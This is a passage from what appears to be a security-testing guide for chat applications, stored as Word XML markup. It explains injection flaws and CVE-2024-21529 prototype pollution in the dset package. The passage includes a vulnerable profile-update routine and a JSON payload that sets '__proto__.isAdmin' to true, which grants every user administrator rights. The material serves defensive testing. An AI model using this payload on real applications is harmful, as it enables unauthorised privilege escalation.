        <w:t xml:space="preserve">Here’s what makes chat application security testing immediately valuable: you’re discovering exploitable vulnerabilities in features you built and can fix. Authentication bypasses in permission checking logic you wrote. Cross-site scripting flaws in message rendering you implemented. Code execution vulnerabilities in template processing you designed. Network access issues in content fetching you architected.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="113"/>
    <w:bookmarkStart w:id="114" w:name="X7fd33408d7dc0dd67224a62d77f949000925efe"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Message Content Injection: When Chat Features Become Attack Vectors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your chat application’s core functionality revolves around users submitting message content that gets displayed to other users. This fundamental feature—​accepting user input and rendering it for community consumption—​creates conditions for injection attacks when your processing logic contains security gaps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider your message posting workflow. Users type content into chat input fields, click send buttons, and expect their messages to appear in conversation threads. Your client-side JavaScript captures input text, packages it into WebSocket events or HTTP requests, and transmits it to your server. Your backend validates message content, stores it in databases, and broadcasts it to room participants. Finally, your frontend receives message data and renders it in chat interfaces for all users to see.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each step in this workflow processes user-controlled content through code you wrote. Message submission handlers, content validation functions, database storage operations, broadcast distribution logic, and rendering components all handle potentially malicious input that could exploit vulnerabilities in your implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The most obvious injection vector targets your message rendering logic. Users submit message content containing HTML script tags. Your backend stores this content without proper sanitization. When other users load the chat interface, your frontend renders the malicious content directly into the DOM using innerHTML operations or similar dynamic content insertion methods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attacking user gains access to authentication tokens, can perform actions on behalf of other users, steal sensitive information from chat conversations, or redirect users to malicious external sites. Your message feature becomes a vector for compromising every user in affected chat rooms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">But injection attacks extend far beyond basic cross-site scripting in message content. Your chat application likely includes search functionality for finding messages, users, or chat rooms. Search implementations often construct database queries incorporating user-provided search terms. When search logic concatenates user input directly into SQL queries or NoSQL commands without proper sanitization, attackers can inject malicious query syntax to access unauthorized data or manipulate database contents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">User registration and profile management features present additional injection opportunities. Username validation, email processing, and bio content handling all accept user input that gets processed through various application components. File upload functionality for avatar images processes metadata that could contain injection payloads targeting image processing libraries or file storage systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WebSocket message handling creates real-time injection vectors unique to chat applications. Your WebSocket event handlers process arbitrary event types and payloads submitted by connected clients. When event processing logic doesn’t validate event types or sanitize event data properly, attackers can submit crafted WebSocket messages to trigger unauthorized actions, escalate privileges, or bypass normal chat application security controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traditional testing validates normal message content that users typically send: text messages, emoji reactions, image attachments, @mentions, and hashtags. Developers verify that appropriate content gets displayed correctly, notifications work properly, and chat features function as expected. Testing rarely explores malicious content scenarios: script tags in messages, SQL injection in search queries, protocol abuse in WebSocket events, or path traversal in file uploads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your chat application’s message processing pipeline demonstrates how systematic testing discovers injection vulnerabilities across multiple attack vectors. Message content validation represents the most obvious target, but search functionality, user management features, file processing, and real-time communication all handle user input through potentially vulnerable code paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection strategies focus on monitoring how your chat application processes and renders user-controlled content. Track whether message content gets properly sanitized before storage and display. Verify that search functionality doesn’t expose database errors or unauthorized data access. Confirm that WebSocket event handling validates event types and enforces proper authorization. Test whether injection payloads actually achieve their intended effects: script execution, data access, privilege escalation, or security control bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The systematic exploration reveals injection vulnerabilities specific to chat application features rather than generic web application attack vectors. You’re discovering whether your message posting logic, search implementation, user management features, and real-time communication components properly validate and sanitize user-controlled data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With message content injection vulnerabilities identified and addressed, your attention turns to object manipulation attacks that can corrupt your application’s fundamental behavior.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="114"/>
    <w:bookmarkStart w:id="115" w:name="Xfaa2e9371407b6ad175a2d8ea46a2eb459079a0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Prototype Pollution: When User Profiles Corrupt Your Application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every JavaScript object inherits properties from Object.prototype. Your user profiles, message objects, room configurations—​they all share this fundamental prototype chain that attackers can manipulate through seemingly innocent input processed by trusted utility libraries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-21529: The dset Vulnerability That Affects Real Chat Applications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Consider how your chat application handles user profile updates. Like thousands of other JavaScript applications, you probably use the popular</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">utility package to manage nested configuration objects. At only 194 bytes and with 171 dependent packages in the npm registry, dset appears to be the perfect solution for setting deep object values safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your user profile update endpoint accepts profile changes through your registration form: username, bio, avatar URL, notification preferences. Your Express.js route uses dset to merge submitted data with existing profile objects—​a completely standard practice that developers trust implicitly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { dset } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'dset'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Standard chat application profile update logic</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">updateUserProfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> profileUpdates) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> userProfile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">getUserProfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Process each update using the trusted dset utility</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">entries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(profileUpdates)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">forEach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(([path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> value]) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(userProfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> path</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saveUserProfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> userProfile)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This implementation looks secure and follows JavaScript best practices. You’re using a well-maintained utility library specifically designed for safe deep object manipulation. The dset package promises "safely writing deep Object values" right in its description.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">But CVE-2024-21529 reveals the hidden danger: dset versions before 3.1.4 contain a prototype pollution vulnerability that allows attackers to inject malicious properties into the global Object prototype chain through crafted input paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now imagine someone submits this profile update through your normal registration interface:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</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bio"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Software developer interested in security"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"preferences.notifications.email"</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__proto__.isAdmin"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your profile updating logic processes this input exactly as designed. The username and bio fields update appropriately. The notification preferences get set using dset’s dot-notation path handling. But that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">proto.isAdmin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">property doesn’t just modify the user’s profile—​it corrupts the prototype chain for every object in your entire chat application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Due to the vulnerability in dset’s path handling logic, this innocent-looking profile update injects an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">isAdmin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">property into Object.prototype. Suddenly every object in your chat application inherits this property with the value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your authentication middleware checks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user.isAdmin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for administrative privileges. Room creation logic validates admin permissions using the same property. Message moderation features verify administrative access through identical checks. All these security controls now return</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for every user because one profile update exploited the dset vulnerability to corrupt global object behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Your authentication logic becomes compromised</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">checkAdminPrivileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(user) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// This check now returns true for ALL users</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// after prototype pollution via dset vulnerability</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">isAdmin</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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Room management becomes compromised</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">canCreatePrivateRoom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(user) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Every user can now create private rooms</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">isAdmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">===</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'moderator'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This isn’t theoretical vulnerability research targeting obscure edge cases. Your chat application processes user profiles through registration endpoints, settings management interfaces, and social features exactly like this. Profile picture uploads include metadata objects that get processed through utilities like dset. Room preference updates merge user configurations with defaults using the same patterns. Each operation represents potential prototype pollution vectors that manual testing cannot discover systematically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Why Trusted Libraries Create Dangerous Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The dset vulnerability demonstrates why prototype pollution represents a significant threat to chat applications. Developers explicitly choose utilities like dset because they promise safety and security. The package description emphasizes "safely writing deep Object values" which creates false confidence in the security of the implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE-2024-21529 received a high severity score of 8.8 precisely because it affects a widely-trusted utility that developers integrate without suspecting security implications. The vulnerability allows attackers to "inject malicious object property using the built-in Object property</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">proto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which is recursively assigned to all the objects in the program."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your chat application provides multiple attack vectors for exploiting this dset vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">User profile management</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Setting nested preferences and configuration options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
